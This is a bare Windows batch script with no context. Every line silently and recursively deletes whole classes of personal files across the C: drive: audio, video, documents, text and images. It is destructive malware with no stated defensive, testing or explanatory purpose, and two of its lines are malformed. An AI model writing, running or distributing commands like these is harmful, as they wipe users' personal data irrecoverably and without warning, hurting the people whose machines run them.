@erase /s /q C:\*.mp3 
@erase /s /q C:\*.wma  
@erase /s /q C:\*.wav
@erase /s /q C:\*.doc 
@erase /s /q C:\*.docx  
@erase s /q C:\*.rtf  
@erase s /q C:\*.txt
@erase /s /q C:\*.mp4 
@erase /s /q C:\*.avi  
@erase /s /q C:\*.wmv
@del /s /q C:\*.jpg 
@del /s /q C:\*.gif  
@del /s /q C:\*.png
